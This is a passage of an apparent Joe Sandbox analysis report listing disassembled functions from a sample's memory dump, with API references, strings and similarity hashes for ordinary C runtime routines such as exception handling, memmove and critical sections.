                                                                                          • Opcode Fuzzy Hash: 7b884588275828c81e8d01c07ddc559fd4b34413a6a5bfca5ab71342d7fd8c24
                                                                                          • Instruction Fuzzy Hash: 5A215071D08288BFEB04DFE8D890BEDFBB4EF09314F10825AE525A7682DB359504CB50
                                                                                          Function 6D004620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004636
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • _memmove.LIBCMT ref: 6D00466F
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 6D004631
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 1785806476-1799206989
                                                                                          • Opcode ID: 51808daab5c06ccc1be0bf7380f14eed62430425366f0f41f443278f2c287917
                                                                                          • Instruction ID: c5a70eb61a036b25d6123a2d36a93b6ba9753740379534de1e79ae974850bfc7
                                                                                          • Opcode Fuzzy Hash: 51808daab5c06ccc1be0bf7380f14eed62430425366f0f41f443278f2c287917
                                                                                          • Instruction Fuzzy Hash: 3101DF3130474077F3218E5CEC80B1AB7EDEBED614B25491DD195CB701E6B1DC4183A6
                                                                                          Function 6D03ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D03ACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: Modulus$PublicExponent
                                                                                          • API String ID: 2241493438-3324115277
                                                                                          • Opcode ID: fe4131dab3a25e6f48b206c88e4a47dd116e5cdeef545706cb4090d92335ab12
                                                                                          • Instruction ID: 334deba7b938e658c00930b605803f589dcf409b51ab63a006d7dedd084f4917
                                                                                          • Opcode Fuzzy Hash: fe4131dab3a25e6f48b206c88e4a47dd116e5cdeef545706cb4090d92335ab12
                                                                                          • Instruction Fuzzy Hash: 7A11E0309193169FDA00DF6C8844A5BFBE4FFD6248F12461EF9859B261DB30D848CB92
                                                                                          Function 6D05B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D05B848
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: Modulus$PublicExponent
                                                                                          • API String ID: 2241493438-3324115277
                                                                                          • Opcode ID: 16d683e13dcdf9cae4cde99377b6174a24511bdc77f117092ba949d1be8801f8
                                                                                          • Instruction ID: a9eda9ddd2bdf3d976f149b38432605e8d97b3d98d034032669c23c085081dac
                                                                                          • Opcode Fuzzy Hash: 16d683e13dcdf9cae4cde99377b6174a24511bdc77f117092ba949d1be8801f8
                                                                                          • Instruction Fuzzy Hash: 3E11E370909345AED700DF28994076BFBE4EFD5244F01066EF9845B291DB30E848CBA6
                                                                                          Function 6D03B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03B605
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D03B634
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: a1f1d6f9517dca1ff49c209d0a37899e3e77ac721eb36f06879cd4361368afc3
                                                                                          • Instruction ID: 8ac2e2bd70836d51d113e8c0c42fb79ba8b045d4607f88a9edd3ca9925ad1aef
                                                                                          • Opcode Fuzzy Hash: a1f1d6f9517dca1ff49c209d0a37899e3e77ac721eb36f06879cd4361368afc3
                                                                                          • Instruction Fuzzy Hash: F401F7B26046068FE324DFA9EC90E6BB3DCEF54214715492DE99BC3650E734F904CB60
                                                                                          Function 6D064230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D064241
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D064277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<bool> too long
                                                                                          • API String ID: 1785806476-842332957
                                                                                          • Opcode ID: 2f0924f2af46b4c9f6fca52c3c7a1635cb2753940722bfbb170d5ed504f461bc
                                                                                          • Instruction ID: 9aa5a9682b167d5ac67f06b818ecdd23605a45b4033f2c7ada364efffcd526c8
                                                                                          • Opcode Fuzzy Hash: 2f0924f2af46b4c9f6fca52c3c7a1635cb2753940722bfbb170d5ed504f461bc
                                                                                          • Instruction Fuzzy Hash: E101FC716041066FE704CFA9DCE09BEF399FB84354FA1422EE51687640D730E918C7A0
                                                                                          Function 6D063840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D063855
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D063880
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: 737e81f11ff9b254ad1ae737865a76e4823c4f6d0cb172e44ac9d14ab66fff53
                                                                                          • Instruction ID: 08a77656eda84300ea0be13f6a97436f9286732a00a5e99b355a334e4e7432ae
                                                                                          • Opcode Fuzzy Hash: 737e81f11ff9b254ad1ae737865a76e4823c4f6d0cb172e44ac9d14ab66fff53
                                                                                          • Instruction Fuzzy Hash: 570188715047055FE314DFEDDC8496BB3D8EF44214715493DE59AD3650EA70F80487B0
                                                                                          Function 6D015160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D015173
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D01519E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: ec6cbdbc4a8b92c567b974f996ecdea623efa6333b3e6fe129d5fefd875ef93c
                                                                                          • Instruction ID: b58dc893e89d10c34a905ab80cf1be954893dba500a4ecae2a6a55d9e4b4d3a0
                                                                                          • Opcode Fuzzy Hash: ec6cbdbc4a8b92c567b974f996ecdea623efa6333b3e6fe129d5fefd875ef93c
                                                                                          • Instruction Fuzzy Hash: 0D01A2B16082069FE728CFE8DC95A7BB3E8EF54244715492DE95AC7640E731F800CB61
                                                                                          Function 6D06BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D06ABC3: __getptd.LIBCMT ref: 6D06ABC9
                                                                                            • Part of subcall function 6D06ABC3: __getptd.LIBCMT ref: 6D06ABD9
                                                                                          • __getptd.LIBCMT ref: 6D06BFC3
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06BFD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 803148776-1018135373
                                                                                          • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                          • Instruction ID: ae1939e9455ef472c0a13b99787d349cd791d2e7cfcec62ecb80a078da02533e
                                                                                          • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                          • Instruction Fuzzy Hash: 140169388083868FFF248F61D444BADBBF5BF08311F61582EE1519A290DB389680DB69
                                                                                          Function 6D073EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::
                                                                                          • String ID: {flat}
                                                                                          • API String ID: 1333004437-2606204563
                                                                                          • Opcode ID: 09be83cc4d112cd7796b035dde7f9321e61afdb8347b6a20b79c8690c5add182
                                                                                          • Instruction ID: 0fc4e7355ef4fa6a04141831fd63a82739c904627dc2a9da983a3a3526d1a693
                                                                                          • Opcode Fuzzy Hash: 09be83cc4d112cd7796b035dde7f9321e61afdb8347b6a20b79c8690c5add182
                                                                                          • Instruction Fuzzy Hash: 3DF0E5751442449FFB20CF58C060BBC3BA0DB4A355F09C145E96C0F283C731D442CB59
                                                                                          Function 6D017673 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,4E8A916F), ref: 6D0176AD
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,4E8A916F), ref: 6D0176FF
                                                                                          • EnterCriticalSection.KERNEL32(4E8A916F,?,?,?,4E8A916F), ref: 6D01770D
                                                                                          • LeaveCriticalSection.KERNEL32(4E8A916F,?,00000000,?,?,?,?,4E8A916F), ref: 6D01772A
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D016D40: _rand.LIBCMT ref: 6D016DEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 119520971-0
                                                                                          • Opcode ID: 564ee9e9edd0872c34500dc8246fab25ef389cf36de2aa0a64a3ce9a758880f3
                                                                                          • Instruction ID: 2ef4564315551c62cb708b11fdb727b4428a52aefc5c908ef7e728bda24df605
                                                                                          • Opcode Fuzzy Hash: 564ee9e9edd0872c34500dc8246fab25ef389cf36de2aa0a64a3ce9a758880f3
                                                                                          • Instruction Fuzzy Hash: 7421C272908649EFDB00CF94CC44BEFB7BDFF85255F114629E92697640EB70AA05CBA0
                                                                                          Function 6D017680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,4E8A916F), ref: 6D0176AD
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,4E8A916F), ref: 6D0176FF
                                                                                          • EnterCriticalSection.KERNEL32(4E8A916F,?,?,?,4E8A916F), ref: 6D01770D
                                                                                          • LeaveCriticalSection.KERNEL32(4E8A916F,?,00000000,?,?,?,?,4E8A916F), ref: 6D01772A
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D016D40: _rand.LIBCMT ref: 6D016DEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 119520971-0
                                                                                          • Opcode ID: 27b90ba03753131606da40ef258364869acae7432bd2d30689e8b428d45edd7d
                                                                                          • Instruction ID: 8d550d48160a0252494552dccd5ec53f9a52d26dda1686c320010d596cf9f2e0
                                                                                          • Opcode Fuzzy Hash: 27b90ba03753131606da40ef258364869acae7432bd2d30689e8b428d45edd7d
                                                                                          • Instruction Fuzzy Hash: 5B21D472908649EFDB00CF94CC40FAFB7BDFF85255F114629E92697640EB70AA05CBA0
                                                                                          Function 6D019580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?), ref: 6D0195A9
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6D0195CA
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D0195DA
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6D0195FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
